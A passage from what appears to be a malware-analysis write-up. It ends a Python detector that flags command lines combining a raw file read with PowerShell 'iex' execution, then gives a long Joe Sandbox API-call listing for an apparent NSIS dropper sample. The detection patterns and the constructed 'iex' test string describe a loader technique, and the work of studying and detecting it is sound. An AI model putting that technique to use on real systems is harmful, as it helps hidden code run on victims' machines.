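# the cmdlet name at the offset the first command line slices.
CONSTRUCTED_PAYLOAD = "#" * 9000 + "iex" + " (rest of script would follow)"


if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        result = analyze(line)
        print(f"{result['verdict']:<10} {result['indicators']}")
    carve = carve_cmdlet(SAMPLE_CMDLINES[0])
    if carve:
        path, off, ln = carve
        print(f"carves {ln} chars at {off} of {path}: "
              f"{recover_token(CONSTRUCTED_PAYLOAD, off, ln)!r}")
```

The verdict deliberately keys on the combination of a raw file read and an execution primitive, not on any single regex: hidden windows and temp paths are common in legitimate installers, while a whole-file read that is then invoked through a variable is the step that turns data into code.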
                          APIs
                          • ShowWindow.USER32(00010464), ref: 004015A6
                          • ShowWindow.USER32(0001045E), ref: 004015BB
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: ShowWindow
                          • String ID:
                          • API String ID: 1268545403-0
                          • Opcode ID: 43fc7ab4d8aab13bbe0e3b58b10b50637c22b5aa756d30fe598e07b3bf5632ed
                          • Instruction ID: 6682d38faa1af99df36a0191d691bb63ef923b98cac77dddb2e5d8f8093f9b88
                          • Opcode Fuzzy Hash: 43fc7ab4d8aab13bbe0e3b58b10b50637c22b5aa756d30fe598e07b3bf5632ed
                          • Instruction Fuzzy Hash: 5AE04F727001109FCF64DB94EEA086E73E6E794310360043FD102B3290C6749C068A68
                          APIs
                          • GetModuleHandleA.KERNEL32(?,00000000,?,0040351A,0000000C), ref: 004066C7
                          • GetProcAddress.KERNEL32(00000000,?), ref: 004066E2
                            • Part of subcall function 00406647: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040665E
                            • Part of subcall function 00406647: wsprintfA.USER32 ref: 00406697
                            • Part of subcall function 00406647: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004066AB
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                          • String ID:
                          • API String ID: 2547128583-0
                          • Opcode ID: 6364b50fcd8a78884de1a109c3061c8e2e734accc18c0610f9b5885e266cf418
                          • Instruction ID: a472cff2ba870c31c69f4352ad77424fb7bed112d4ffd52c95bf20a34481097e
                          • Opcode Fuzzy Hash: 6364b50fcd8a78884de1a109c3061c8e2e734accc18c0610f9b5885e266cf418
                          • Instruction Fuzzy Hash: BAE08C73A04210ABD610A6709E0883B73ACAF897413030C3EF952F2240DB3ADC32966E
                          APIs
                          • GetFileAttributesA.KERNELBASE(00000003,00402F71,C:\Users\user\Desktop\vfhlZ0vrbe.exe,80000000,00000003,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00405E24
                          • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00405E46
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: File$AttributesCreate
                          • String ID:
                          • API String ID: 415043291-0
                          • Opcode ID: 4c035aff046b4d43788645f88f630755698ea216f1f6cd5eefec511dda558379
                          • Instruction ID: 0febe3887fb1e567d40345103610fd6f3e8d71b3c6328ccb34cdb50f288ecb70
                          • Opcode Fuzzy Hash: 4c035aff046b4d43788645f88f630755698ea216f1f6cd5eefec511dda558379
                          • Instruction Fuzzy Hash: 23D09E31254301AFEF099F20DE16F2E7AA2EB84B00F11952CB682A41E0DA7158299B15
                          APIs
                          • GetFileAttributesA.KERNELBASE(?,?,00405A13,?,?,00000000,00405BF6,?,?,?,?), ref: 00405E00
                          • SetFileAttributesA.KERNELBASE(?,00000000), ref: 00405E14
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: AttributesFile
                          • String ID:
                          • API String ID: 3188754299-0
                          • Opcode ID: 96c7ec262ab61fe6fea47152b5241fdb13327e4bfef36903235a76d16f55e530
                          • Instruction ID: f779a6514c6a4e708396d8c5aab00734bb1243d63453d3b06c62658839fa2b1d
                          • Opcode Fuzzy Hash: 96c7ec262ab61fe6fea47152b5241fdb13327e4bfef36903235a76d16f55e530
                          • Instruction Fuzzy Hash: 20D0C9725056206BC2103B28EE0889BBB55DB542717028B35F9A9A22B0CB304C668B98
                          APIs
                          • CloseHandle.KERNEL32(FFFFFFFF,004037BF,?,?,00000008,0000000A,0000000C), ref: 004039C7
                          Strings
                          • C:\Users\user\AppData\Local\Temp\nsw42F9.tmp\, xrefs: 004039DB
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: CloseHandle
                          • String ID: C:\Users\user\AppData\Local\Temp\nsw42F9.tmp\
                          • API String ID: 2962429428-46641210
                          • Opcode ID: 690aa45f0be1a931a0176c4e0d9fa5981e6643ccd20a8d7c7662d168512a01e4
                          • Instruction ID: afeb4de79f0a024d8aad6c8bb86ec84bc3369b341d6032a4bf43371fdf378432
                          • Opcode Fuzzy Hash: 690aa45f0be1a931a0176c4e0d9fa5981e6643ccd20a8d7c7662d168512a01e4
                          • Instruction Fuzzy Hash: B1C0223020030066C0206F788E8F5483A045740339BA18336F0B8F04F1CB3C068C0D5D
                          APIs
                          • CreateDirectoryA.KERNELBASE(?,00000000,004033CB,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,00000008,0000000A,0000000C), ref: 004058F7
                          • GetLastError.KERNEL32(?,00000008,0000000A,0000000C), ref: 00405905
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: CreateDirectoryErrorLast
                          • String ID:
                          • API String ID: 1375471231-0
                          • Opcode ID: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
                          • Instruction ID: 226d66ac6a6a747d722d053d5b09978fff7ae735be90135577c6d3bd4ef0b281
                          • Opcode Fuzzy Hash: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
                          • Instruction Fuzzy Hash: F9C04CB120490ADED6505B319F0971B7A51AB50751F175839A586E40A0DB348455DD2E
                          APIs
                          • MoveFileA.KERNEL32(00000000,00000000), ref: 004016AA
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: FileMove
                          • String ID:
                          • API String ID: 3562171763-0
                          • Opcode ID: 01db277db8653d624179d7b600e08ca7f67f5e45fdde97e81b8b39cbf95d4e5b
                          • Instruction ID: 67493920040547a329b99de5d89bb6d269ebd8b6645208cc7e8d7a7b283b3978
                          • Opcode Fuzzy Hash: 01db277db8653d624179d7b600e08ca7f67f5e45fdde97e81b8b39cbf95d4e5b
                          • Instruction Fuzzy Hash: 09F0B431608125A7DF20BB765F5DE5F52A49B41378B20423BF212B21D1DABDC643856E
                          APIs
                          • WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 00402402
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: PrivateProfileStringWrite
                          • String ID:
                          • API String ID: 390214022-0
                          • Opcode ID: 3326b8378841c5f3540bed9b182ec42c057636b7d1278427695ffb5e145c9da6
                          • Instruction ID: f24de8215b53ecbcf80a61348f6bfc7870897c54b3e6c90e9d08f7162164e460
                          • Opcode Fuzzy Hash: 3326b8378841c5f3540bed9b182ec42c057636b7d1278427695ffb5e145c9da6
                          • Instruction Fuzzy Hash: 9DE04F3160413A6BEB6036B11F8D97F2159AB84314B14053EBA11B62C6D9FC8E8352A9
                          APIs
                          • RegCreateKeyExA.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402D0F,00000000,?,?), ref: 0040616A
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: Create
                          • String ID:
                          • API String ID: 2289755597-0
                          • Opcode ID: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
                          • Instruction ID: bbdc12591f07ec5b960d4a172b59ed2570ed34ba37628b65f55bcc9503456b15
                          • Opcode Fuzzy Hash: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
                          • Instruction Fuzzy Hash: 7AE0E6B2020109BEEF099F60DC1AD7B772DE708310F01492EFA06D4151E6B5E9705634
                          APIs
                          • SearchPathA.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 00401758
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: PathSearch
                          • String ID:
                          • API String ID: 2203818243-0
                          • Opcode ID: 4205dc15fe547f27f479e1deebd95f86bdda3a1c9deaf9bd02e28dbd9a4af209
                          • Instruction ID: 05024ed45ffdbec093a2934bfd596ec6e4c724010b47aa93efab37ffede3367c
                          • Opcode Fuzzy Hash: 4205dc15fe547f27f479e1deebd95f86bdda3a1c9deaf9bd02e28dbd9a4af209
                          • Instruction Fuzzy Hash: A5E0D871304100EFEB10CB649D48AAB3798DB10368B30453AE501A20C2D5B58946872C
                          APIs
                          • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403343,00000000,0041D440,000000FF,0041D440,000000FF,000000FF,00000004,00000000), ref: 00405EDB
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: FileWrite
                          • String ID:
                          • API String ID: 3934441357-0
                          • Opcode ID: 11d7c7005d0d3054af3b9be2f3a82004ed33d4240877e49ff836af06555e7eff
                          • Instruction ID: 0d77a24040528495e1d5683a333844bda4a24a81b27895c3293bddb668a77566
                          • Opcode Fuzzy Hash: 11d7c7005d0d3054af3b9be2f3a82004ed33d4240877e49ff836af06555e7eff
                          • Instruction Fuzzy Hash: 20E0EC3221065EABDF509F55DC00EEB7B6CEB05360F004837F965E2150D631EA219BE9
                          APIs
                          • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040338D,00000000,00000000,004031B7,000000FF,00000004,00000000,00000000,00000000), ref: 00405EAC
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: FileRead
                          • String ID:
                          • API String ID: 2738559852-0
                          • Opcode ID: 62c77d97b5b576e4a72063145ecbe95ee4dab9ee0079c0f8f42f41321a19b9da
                          • Instruction ID: c4f2c5db2c8838af9825f3b875f3a0ad88d5b51994199861a780369f0be58439
                          • Opcode Fuzzy Hash: 62c77d97b5b576e4a72063145ecbe95ee4dab9ee0079c0f8f42f41321a19b9da
                          • Instruction Fuzzy Hash: E4E04F32210619ABDF109F60DC04EAB3B6CEB00351F000432F954E2140D230E9118AE4
                          APIs
                          • GetPrivateProfileStringA.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 00402440
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: PrivateProfileString
                          • String ID:
                          • API String ID: 1096422788-0
                          • Opcode ID: 2bf3f178d14cd4560723ce1317423526718b1f73ef5608a9eed72cfac383f117
                          • Instruction ID: 16d05768d70be94792168112439c0a82a49a1a045ba9b991e9e4b5323ac17763
                          • Opcode Fuzzy Hash: 2bf3f178d14cd4560723ce1317423526718b1f73ef5608a9eed72cfac383f117
                          • Instruction Fuzzy Hash: 2CE04F3190821DBAEB007FA08F09AAD2A69AF01720F10002AFA507A0D1E6B98583971D
                          APIs
                          • RegOpenKeyExA.KERNELBASE(00000000,?,00000000,?,?,?,?,?,004061A1,?,?,?,?,00000000,?), ref: 00406137
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: Open
                          • String ID:
                          • API String ID: 71445658-0
                          • Opcode ID: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                          • Instruction ID: 4278cf0171cf0b678593f71500b3925c4415a8e9ce87015ff7d519d2eb21bae6
                          • Opcode Fuzzy Hash: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                          • Instruction Fuzzy Hash: BCD0123204020DBBDF119E90AD01FAB3B1DEB48350F014826FE07A8091D775D570A724
                          APIs
                          • SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015CD
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: AttributesFile
                          • String ID:
                          • API String ID: 3188754299-0
                          • Opcode ID: 93233afc89f5dcba0ebf1b763322780f207c5d8236f145893b8d4ae7afdee906
                          • Instruction ID: 7d2cdf6a56bb8b2c4d8e447006d96498fe5724c9cded2cbb68f68f822827988b
                          • Opcode Fuzzy Hash: 93233afc89f5dcba0ebf1b763322780f207c5d8236f145893b8d4ae7afdee906
                          • Instruction Fuzzy Hash: BED01732708214DBDF60DBA8AF08A9FB3A4AB10328B20413BD211F21D1D6B9C5469B2D
                          APIs
                          • SendMessageA.USER32(00010458,00000000,00000000,00000000), ref: 0040438B
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: MessageSend
                          • String ID:
                          • API String ID: 3850602802-0
                          • Opcode ID: a0eb0ef1ff6dd579934d65901b95a1f3a9c939147581cb3b9152e9d48dc718fa
                          • Instruction ID: f513ac05e70e3adf76b651c0ca8ec4e95b66ff2fdc1b64d79a05bcbbe3c40a95
                          • Opcode Fuzzy Hash: a0eb0ef1ff6dd579934d65901b95a1f3a9c939147581cb3b9152e9d48dc718fa
                          • Instruction Fuzzy Hash: 4DC09BB17403027BFE209B529E45F077798D790700F1554397754F54D0C774D410D62C
                          APIs
                          • SendMessageA.USER32(00000028,?,00000001,00404192), ref: 00404370
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmp
